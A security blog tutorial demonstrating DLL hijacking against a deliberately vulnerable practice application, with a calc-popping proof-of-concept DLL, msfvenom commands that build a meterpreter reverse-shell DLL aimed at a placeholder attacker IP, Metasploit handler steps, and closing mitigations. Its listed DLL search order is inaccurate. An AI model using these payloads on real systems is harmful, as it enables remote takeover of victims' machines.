Hello Friends, writing this blog as an attempt to help you to identify and exploit the DLL Hijacking vulnerability in the windows executables. Kindly note that this blog is purely for educational purpose and I am not responsible for malicious activity performed by you. Also, here to make attack easier to understand I have used Damn vulnerable thick client (DVTA) executable which is an intentionally-made vulnerable executable which is awesome for practice purpose and it can be found here.
Here I am going to cover the below topics for DLL Hijacking.
1. What is Dynamic Link Library (DLL)?
2. What is DLL Hijacking?
3. What should we know about exe before performing the attack and why?
4. How to identify if your executables is vulnerable to DLL Hijacking?
5. How to attacker can exploit it?
6. What is the impact of it?
7. What is the recommendation for it?
So, let’s get started…
What is Dynamic Link Library (DLL)?
A DLL is a library that contains code and data that can be used by more than one program at the same time. For example, in Windows operating systems, the Comdlg32 DLL performs common dialog box related functions. Each program can use the functionality that is contained in this DLL to implement an Open dialog box. It helps promote code reuse and efficient memory usage. Learn more
What is DLL Hijacking?
When we open the executable file in windows, it looks for its required DLLs in the system and load them. The application load order is as follows.
· C:\Windows\System32
· C:\Windows\System
· C:\Windows
· The current working directory
· Directories in the system PATH environment variable
· Directories in the user PATH environment variable.
However, when these DLLs does not exist on the system then we can force application to execute malicious DLL and this attack known as DLL hijacking.
What should we know about exe before performing the attack and why?
Before we move ahead with DLL Hijacking identification, we must need to know the architecture of the application for which you can check which application website while downloading the application or sigcheck from sysinternal suite or you can also use CFF explorer to identify the same.
Here I will show you two methods to identify the same using below two methods.
1. Sigcheck
2. CFF Explorer
Method I : Using Sigcheck
- Extract the sysinternal suite zip
2. Now open command prompt and in the same folder do the following as shown in below image.
Method II: Using CFF Explorer
Open CFF explorer and navigate to file > open and open the DVTA.exe from explorer and in file type we can see the architecture of executables.
From the above methods we can conclude that it is a 32-bit executable. So now we know its architecture we can move ahead for identification of DLL Hijacking vulnerability.
Why should we know the architecture of exe file?
It is required to create malicious DLL of the appropriate architecture (in this case 32 bit).
How to find the DLL path in the exe which might be vulnerable to DLL Hijacking?
To identify we need to use Process monitor (procmon.exe) tool from windows sysinternal suite.
- Navigate to sysinternal suite and open Procmon
2. Apply the filter as shown below or use can tweak it more to get more refined results.
3. Now execute the application and we can see that multiple “NAME NOT FOUND” registry and dll’s are loaded. But out of so many missing dll’s path I have selected “DWrite.dll” because here selecting valid missing dll path plays very important role as it would be very challenging job to put malicious dll file in C:\windows directory in restricted environment. Hence, we have selected the path were placing malicious dll is very simple i.e., on Desktop path.
Now we have got the path where we goanna put the malicious DLL so let move ahead to identify if your file is vulnerable to DLL Hijacking.
How to identify if your executables is vulnerable to DLL Hijacking?
There are two ways to identify it
1. Manual Creating DLL
2. Automated Scanner
Method 1: By manually creating DLL
Pre-requisites: Visual studio
- Create a new project in visual studio and select DLL.
2. Copy paste the below code and build the code in visual studio.
Code:
#include “pch.h”
#include <windows.h>
int maliciousTestDll()
{
WinExec(“calc”, 0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
maliciousTestDll();
return 0;
}
What does this created Dwrite.dll do?
Dwrite.dll when get loaded by any exe than the built-in code of dll pop-ups the calculator and if the calculator is pop-up we can conclude that the exe is vulnerable to DLL hijacking.
3. We can see that DLL is successfully built.
4. Now copy paste the DWrite.dll in previously identified path i.e., path identified using Procmon.
5. Double-click the DVTA.exe and we can see that malicious DLL is successfully loaded in exe and calculator is popped-up.
Method 2: By using automated scanner viz DLL Hijack auditor.
It is not a recommended method as it sometimes even if exe is vulnerable to DLL hijacking it is marking as safe.
Please refer image for detailed instruction about usage of this tool.
How attacker can exploit it?
Attacker can make the malicious dll and can reach your system in many ways (most likely with phishing) and can get full control over your system.
As we know the DLL in the identified path is getting executed in the exe so we perform the below attack.
Here I will demonstrate with two system.
1. Kali Linux (Attacker)
2. Windows 10 (Victim where DVTA.exe is installed)
Step 1: Create a malicious DLL with msfvenom in kali Linux
For 32 bit architecture:
msfvenom -p windows/meterpreter/reverse_tcp lhost=<attacker ip> lport=<any port> -f dll > dllname.dll
For 64 bit architecture:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<attacker ip> lport=<any port> -a x64 -f dll > dllname.dll
p: Payload
f: filetype
lhost: listening host
lport: listening port
a: architecture
Now we have successfully built the payload.
Step 2: Now we need to listen reverse tcp using Metasploit.
1. Open a new terminal and type msconsole.
2. Type msf> use exploit/multi/handler
3. Set the payload as below image
4. Set the listening host and run the exploit
Step 3: Keep the malicious DLL in identified path of victim windows machine.
Step 4: Double click and open DVTA.exe. Now we have successfully got reverse shell of Victim system in KALI attacker machine.
What is the impact of it?
It can execute malicious code in a DLL file and helps attacker to get access to your computer or a network.
What is the recommendation for it?
· Good network practices such as having a strong firewall installed and using intrusion detection systems are a first line of defence.
· Blocking the TCP ports 445 and 139 (which are most commonly used for compromising computers) is another effective step.
· Making sure that your operating system and applications are up to date and regularly patched can ensure that you have the latest defenses.
· Enabling SafeDllSearchMode to prevent attackers from exploiting the search path.
· Ensure that only signed DLLs are loaded for most systems process and applications.
· In order to avoid DLL Hijacking, it is best to write secure code for loading DLL from specified path only.
Reference:
https://cyware.com/news/dll-hijacking-attacks-what-is-it-and-how-to-stay-protected-5056c0f0
https://blog.finjan.com/best-practices-to-prevent-dll-hijacking/